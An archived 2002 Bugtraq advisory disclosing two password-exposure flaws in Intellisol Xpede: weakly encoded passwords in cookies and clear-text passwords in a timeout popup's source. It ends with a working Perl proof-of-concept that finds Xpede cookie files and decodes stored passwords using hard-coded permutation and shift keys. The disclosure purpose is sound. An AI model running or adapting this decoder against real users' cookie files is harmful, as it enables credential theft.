[24797] in bugtraq
Xpede passwords exposed (2 vuln.)
daemon@ATHENA.MIT.EDU (Gregory Duchemin)
Fri Mar 22 12:02:18 2002
Date: 22 Mar 2002 13:04:31 -0000
Message-ID: <20020322130431.14486.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Gregory Duchemin <c3rb3r@hotmail.com>
To: bugtraq@securityfocus.com
Passwords exposed in Intellisol XPede
==========================
About Xpede
=========
quote from
http://www.workforceroi.com/solutions/pa/index.shtml
"Intellisol Xpede is a browser-based time and
expense entry and project cost management module
designed to connect a remote workforce on a real-
time basis.
Intellisol Project Accounting is designed for any
professional service organization such as consulting,
software development, law, architecture,
engineering, PR/advertising and more with between
10 and 500 million dollars in revenue and up to 500
employees,
and integrates with Microsoft Great Plains Business
Solutions financial suites. "
Problems
=======
Tested with Xpede 4.1 / NT 4.0
Two security vulnerabilites has been discovered in
the way Xpede handle users password.
1/ Xpede's cookies store users
password "ciphered" in a very weak manner (a mix of
shifts and permutations),
recovering a clear text password from there is really
trivial making users remotely vulnerable from cross
site scripting based attacks,
various MSIE bugs while users are locally vulnerable
as well, by accessing the local filesystem (ie the
cookie file) when, for instance,
a user decide to use someone else's computer or is
using a computer for wich he shares Administrator
rights with other.
2/ Passwords are shown in a clear form into
the "session timeout" re-authentication popup source.
The dangerous guilty javascript snipet simulate
a "remember password" option and tests if it was
checked to automatically fill up the formular
password field.
The clear password is shown as is, in the javascript
source code, whatever the user decided to do with
the option.
Indeed, a user can have a false sense of safety,
leaving his host even few seconds without having
filled up the authentication popup
and therefore exposing his password to everybody
lurking at the source and, once again, is remotely
vulnerable to the same MSIE bugs mentionned above.
Temp workarounds
=============
1 st problem / clear all cookies via
MSIE "Tools/Internet Options/General/Delete
Cookies" right after a session has ended
to avoid local attack and patch your browser with the
latests security fixes if it wasn't already done
(anyway, u may fall in more serious troubles in the
latter case :).
2 nd problem/ do not expose the authentication
popup to unwise eyes (login or quit the application)
and again, patch your browser for remote attacks.
Additionnaly for paranoids, i suggest to close all MSIE
running windows before accessing Xpede application
(and during the session).
Vendor status
=========
The vendor has been contacted on March 13. and as
far as i know, is currently working on a patch,
in the meantime, u may want to use the above
workarounds.
Versions
======
Xpede support team has reported that both Xpede 4.1
and 7.x series were affected by these vulnerabilities.
Author & Date
===========
Gregory Duchemin (c3rb3r@hotmail.com)
20 March 2002.
Have a nice day.
Proof of concept (password recovery from cookies)
====================================
#!/usr/bin/perl
# Xdeep.pl, search for and decipher Xpede
passwords stored in these damn cookies
# Pr00f of concept, not to be used for illegal purposes.
#
# Author: Gregory Duchemin Aka c3rb3r // March
2002
#
#output format
format STDOUT =
+ Userid: @<<<<<<<
$userid
+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<
$realname
+ Company: @<<<<<<<<<<<<<<<<<<<<
$company
+ Encoded password: @<<<<<<<<<<<<<<<<<<<<
$password
.
#Cookie fingerprint
$signature="defPWD";
#decoding stuff
@PERMU=('9', '11', '2', '6', '4', '10', '1', '8', '7', '3', '5');
@ALPHA=
('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O'
, 'P', 'Q', 'R','S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a','b','c','d','
e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y'
,'z');
@SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);
#Change the following path to match your system
@COOKIE= glob
('c:\winnt\Profiles\*\Cookies\*@*.txt');
$i=$count=0;
@FOUND= ('nope');
print "\n\nXdeep.pl Xpede cookies finder and decoder
\n\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --
\n\n\n";
foreach $try (@COOKIE) {
$count++;
if (open(handle, $try))
{
@lines=<handle>;
if (!index($lines[0], $signature))
{
printf("\n+ Xpede cookie found ! yep :) <=> %s\n",
$try);
$FOUND[$i]=$try;
$i++;
}
close(handle);
}
}
printf("\n+ %d files checked.\n", $count);
if (! $i)
{
print "\n\n- No Xpede cookie found, sorry\n\n";
exit(0);
}
printf("\n\n+ %d Cookie(s) found.\n", $i);
print "\n\n\n[Press return]\n";
$try=<STDIN>;
foreach $try (@FOUND) {
if (open(handle, $try))
{
@lines=<handle>;
$userid= @lines[55];
$realname=@lines[64];
$password=@lines[46];
$company=@lines[28];
$realname =~ s/\+/ /;
$userid =~ s/\+/ /;
$password =~ s/\+/ /;
$company =~ s/\+/ /;
$userid =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig;
$realname =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig;
$password =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig;
$company =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig;
printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try;
write;
print "\n\n! Cr4cking 1n progr3ss ... \n";
@list=split //, $password;
if (length($password) > 12 )
{
$MAX = 11;
$DIFF = length($password)-1-$MAX;
for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list
[$i]; }
splice(@list, 0, ($DIFF));
printf "\n+ Clear part is %s\n", $REST;
}
else {$MAX = length($password)-1;printf "\n- No clear
part found \n";}
for ($i=0; $i<$MAX; $i) { $temp_pass =
$temp_pass.$list[$PERMU[$i++]-1]; }
printf "\n+ Permutations give %s\n", $temp_pass;
@list=split //, $temp_pass;
for ($i=0; $i<$MAX; $i++)
{
$b = ord($list[$i]);
$c = $SHIFT[$i];
$flag=0;
for ($z=0; $z<52; $z+=1)
{
if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA
[($z+$c)%52]);$flag=1;}
}
if (!$flag) {$a = $b;}
$decode = $decode.chr($a);
printf "\n+ %s Shift(%d) \t --> \t%s", chr($b), $c, chr
($a);
}
printf "\n\n+ Shifting with secret key give %s\n",
$decode;
printf "\n! Password is \"%s\"\n\n", $decode.$REST;
printf "\n\n- End.\n\n";
$decode=$REST=$temp_pass="";
close(handle);
print "\n\n[Press return]\n";
$try=<STDIN>;
}
}
